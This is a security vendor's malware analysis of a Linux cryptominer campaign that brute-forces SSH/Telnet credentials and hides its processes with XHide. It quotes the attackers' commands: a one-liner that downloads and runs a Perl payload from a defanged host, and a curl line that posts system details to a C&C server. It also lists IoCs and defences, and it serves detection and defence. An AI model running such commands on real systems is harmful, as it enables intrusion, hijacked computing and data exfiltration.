Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers

By Augusto Remillano II and Jemimah Molina (Threats Analysts)

A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used by the miner to host the command for downloading the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS). The cryptocurrency-miner, a multi-component threat comprised of different Perl and Bash scripts, miner binaries, the application hider Xhide, and a scanner tool, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.

Analysis of the threat revealed that the threat actor behind the malicious activity executes component files that run multiple times daily so that the infected machine’s status is regularly sent to the command-and-control server (C&C). The shell script used in the infection is also capable of downloading archived files that contain the miner’s scanner, hider, and final payload.

The threat also employs a process hider to conceal the miner binary, which makes a typical user more unlikely to notice the mining activity save for a drop in performance and suspicious network traffic. This method has been a known cover for threat actors that aim to scan, brute force, and mine.

Old Tools for New Money: URL Spreading Shellbot and XMRig Using 17-year-old XHide

We detected a threat that propagates by scanning for open ports and brute forcing weak credentials, installing a Monero cryptocurrency miner and a Perl-based IRC backdoor as the final payload. The miner process is hidden using XHide Process Faker, a 17-year old open source tool used to fake the name of a process.

The infection

The attacker starts by gaining access to a machine through weak or default credentials. Then, a command will be run on the compromised machine:

cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl -O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*

The initial file min (detected as Trojan.Perl.MALXMR.UWEJS) downloads another file min.sh (detected as Trojan.SH.MALXMR.UWEJS), which is the main shell script that installs the various components of this threat. After executing the main shell script, it will try to kill existing cryptocurrency-mining processes:

killall -9 rand rx rd tsm tsm2 haiduc a sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr python cron ntpd start start.sh libssl sparky.sh

The shell script also downloads and executes the component file downloaders cron.sh and nano.sh (Trojan.SH.MALXMR.UWEJT), which are executed daily by the hour and every 30 minutes respectively. These files drop rcmd.sh (detected as Trojan.SH.MALXMR.UWEJU), which is responsible for regularly reporting back to the C&C via an HTTP post request on the status of the infected machine:

curl -d "info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc) PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)" hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null

The archived files

The shell script is also capable of downloading and extracting the miner archive monero.tgz (detected as Trojan.Linux.MALXMR.UWEJS) for the execution of its contents. The archive file contains the miner binaries, which can be executed by various shell and Perl scripts that are also contained in the file.

The contents of the archive file are primarily configuration files and those that execute various component files, such as config.txt, cpu.txt, h32 (Xhide 32-bit), h64 (Xhide 64-bit), pools.txt, run, startMSR, x, x.pl, xmr-stak, and xmrig. The binary Xhide is responsible for hiding cryptocurrency-mining processes through changing process names into “-bash”.

The main shell script then proceeds to download and extract the scanner archive sslm.tgz (detected as Trojan.Linux.SSHBRUTE.UWEJS) for execution. The archive houses the Telnet/SSH scanner binary, the corresponding shell and Perl scripts that will execute it, and the list of passwords that will be used for scanning.

Perl-Based Shellbot Looks to Target Organizations via C&C

We uncovered an operation of a hacking group, which we’re naming “Outlaw” (translation derived from the Romanian word

haiduc

, the hacking tool the group primarily uses), involving the use of an IRC bot built with the help of Perl Shellbot.

The contents of the scanner archive include .pass (short password list used for random public IP blocks), pass (long password list used for private IP blocks), libssl (the UPX-packed Haiduc scanner), sparky.sh, start, start.pl, and start.sh.

The scanner would attempt to infect and gain control of devices in a private IP range (It will try to infect all devices in the same local network as the host machine) by brute forcing a list of credentials that contain 3,637 username and password combinations. It also tries to infect devices in the public IP range of {random number from 0-216}.0.0.0/8 by using a different, shorter credentials list. Based on the credentials used, the attack mostly targets servers related to databases, storages, gaming, and mining rigs.

If successful, the attacker will then be able to issue the aforementioned commands for cryptocurrency-mining.

Protecting devices from cryptocurrency-mining threats

The threat actors behind this cryptocurrency-miner have utilized Haiduc and Xhide, known and old tools that have been notoriously used for various malicious activities. These tools, combined with brute-forced weak credentials, can persist in systems while operating under the radar of traditional network security solutions. Such malware can also affect system performance and expose users to other forms of compromise.

While we haven’t seen widespread attacks from this threat actor yet, users should adopt security measures that can defend systems against any potential attacks, such as:

• Taking caution against known attack vectors such as unsolicited emails, socially engineered links and attachments, suspicious websites, and dubious third-party applications
• Changing devices’ default credentials to prevent unauthorized access
• Updating devices with the latest patches
• Regularly verifying that all created accounts are only used for legitimate purposes

Users can also consider adopting security solutions that can provide protection from malicious bot-related activities through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Users of the Trend Micro™ Deep Discovery Inspector (DDI) are protected from this threat via these rules, which cover the mining network traffic and C&C connection respectively:

• Rule 2573: MINER – TCP (Request)
• Rule 4313 – MALXMR – HTTP (Request)

Indicators of compromise (IoCs)

SHA-256

config.txt
91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906
Trojan.Win32.MALXMR.BJ
Config file

cpu.txt
60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53a
Trojan.Win32.MALXMR.BJ
Config file

cron.sh
fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e
Trojan.SH.MALXMR.UWEJT
Downloads component file

h32
45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161
HackTool.Linux.XHide.GA
Xhide binary (32-bit)

h64
7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf
HackTool.Linux.XHide.GA
Xhide binary (64-bit)

libssl
6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4
HackTool.Linux.SSHBRUTE.GA
Haiduc scanner (UPX packed)

min
07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861ab
Trojan.Perl.MALXMR.UWEJS
Downloads the main shell script

min.sh
3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460
Trojan.SH.MALXMR.UWEJS
Main shell script

monero.tgz
eb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544
Trojan.Linux.MALXMR.UWEJS
Miner archive

nano.sh
fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e
Trojan.SH.MALXMR.UWEJT
Downloads component file

pools.txt
cd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57
Trojan.Win32.MALXMR.BJ
Config file

rcmd.sh
46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccff
Trojan.SH.MALXMR.UWEJU
Reports to C&C

run
420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1
Trojan.SH.MALXMR.UWEJW
Executes miner and hider component

sparky.sh
64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18
Trojan.SH.SSHBRUTE.UWEJS
Executes scanner component

sslm.tgz
8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5f
Trojan.Linux.SSHBRUTE.UWEJS
Scanner archive

start
5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659b
Trojan.SH.SSHBRUTE.UWEJS
Executes component file

start.sh
d75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049
Trojan.SH.SSHBRUTE.UWEJS
Executes component file

startMSR
473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacb
Trojan.SH.MALXMR.UWEJW
Executes miner and hider component

x
78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4d
Trojan.SH.MALXMR.UWEJS
Executes component file

xmr-stak
8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c
Coinminer.Linux.MALXMR.UWEKF
Miner binary

xmrig
e41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abb
Coinminer.Linux.MALXMR.SMDSL64
Miner binary

Related malicious URLs

139[.]99[.]42[.]75:3333

pool[.]masari[.]hashvault[.]pro:3333

hxxps://upajmeter[.]com/assets/.style/min

hxxps://upajmeter[.]com/assets/.style/min.sh

hxxps://upajmeter[.]com/assets/.style/remote/cron.sh

hxxps://upajmeter[.]com/assets/.style/monero.tgz

hxxps://upajmeter[.]com/assets/.style/sslm.tgz

hxxps://upajmeter[.]com/assets/.style/remote/info.php

hxxps://upajmeter[.]com/assets/.style/remote/rcmd.sh

HIDE

Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.